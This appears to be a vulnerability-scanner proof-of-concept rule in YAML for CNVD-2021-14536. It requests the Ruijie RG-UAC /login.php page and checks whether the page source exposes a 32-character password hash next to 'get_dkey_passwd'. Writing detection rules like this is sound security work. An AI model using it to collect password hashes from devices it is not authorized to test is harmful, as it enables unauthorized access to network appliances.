name: poc-yaml-ruijie-uac-cnvd-2021-14536
rules:
  - method: GET
    path: /login.php
    follow_redirects: false
    expression: |
      response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
detail:
  author: jweny(https://github.com/jweny)
  links:
    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065